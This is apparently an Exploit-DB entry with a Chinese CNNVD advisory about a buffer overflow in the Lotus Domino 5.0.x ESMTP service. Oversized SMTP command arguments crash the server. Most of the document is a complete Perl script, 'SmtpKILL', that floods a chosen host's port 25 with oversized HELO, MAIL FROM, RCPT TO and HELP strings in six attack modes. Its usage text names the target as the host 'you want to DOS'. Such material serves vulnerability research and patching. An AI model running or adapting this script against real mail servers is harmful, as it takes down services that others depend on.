https://www.exploit-db.com/exploits/19944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-075

LotusDomino服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和MicrosoftWindows操作系统平台下。LotusDomino服务器的ESMTP服务存在缓冲区溢出漏洞，远程攻击者可能可以利用这个漏洞进行拒绝服务攻击。LotusDomino服务器的ESMTP服务在处理’rcptto’、’samlfrom’和’somlfrom’命令时缺乏缓冲区检查。如果LotusDomino服务器接受到这三个命令中任意一个，并且参数超过4KB，系统将崩溃并且只有重起才能恢复继续服务。

Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow

source: http://www.securityfocus.com/bid/1229/info

The code that handles the 'rcpt to' 'saml from' and 'soml from' commands in the ESMTP service of Lotus Domino Server has an unchecked buffer. If Lotus Domino Server receives an argument of more than 4 KB to the any of the listed commands, the system will crash and will require a reboot in order to regain normal functionality. 

#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By [email protected]
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0 
# and probably many others that I hadnt chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;   


print "SmtpKILL By [email protected]";

if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl  <type> <host>
	<type> Type of attack :
		type 1 = long mail from: someone@4k_of_junk
		type 2 = long rcpt to: someone@4k_of_junk
		type 3 = long helo longdomain_with_4k_of_junk
		type 4 = long undefined command (4k_of_junk)
		type 5 = long help 4k_of_junk
		type 6 = long mail from: and mail to:

	<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}      

$type=$ARGV[0];
$target=$ARGV[1];

print "TYPE ATTACK: $typen";
print "TARGET : $targetn";



for ($i=4096;$i<5096;$i++)
 {
        $obj=Net::Telnet->new( Host => "$target",Port => 25);    

	if ($type=~ "1") { 
	$helo="helo ptrulez";
	$from="mail from: v0v0@". 'ptrulez' x $i;
	$rcpt="rcpt to: [email protected]";
	}

	if ($type=~ "2") { 
	$helo="helo ptrulez";
	$from="mail from: [email protected]";
	$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
	}

	if ($type=~ "3") {
	$helo="helo ". 'ptrulez' x $i;
	$from="mail from: [email protected]";
	$rcpt="rcpt to: [email protected]";
	}

	if ($type=~ "4") {
	$helo="havesomefun". 'ptrulez' x $i;
	}

	if ($type=~ "5") {
	$helo="help ". 'ptrulez' x $i;
	}

	if ($type=~ "6") {
	$helo="helo ptrulez";
	$from="mail from: ". 'ptrulez' x $i;
	$rcpt="rcpt to: ". 'ptrulez' x $i;
	}

        print "$helon";$obj->print("$helo");   
        print "$fromn";$obj->print("$from");
        print "$rcptn";$obj->print("$rcpt");    
        $obj->close;
 }

来源:BID
名称:1229
链接:http://www.securityfocus.com/bid/1229
来源:OSVDB
名称:321
链接:http://www.osvdb.org/321
来源:BUGTRAQ
名称:20000518LotusESMTPService(LotusDominoRelease5.0.1(Intl))
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0219.html
来源：NSFOCUS
名称：531
链接：http://www.nsfocus.net/vulndb/531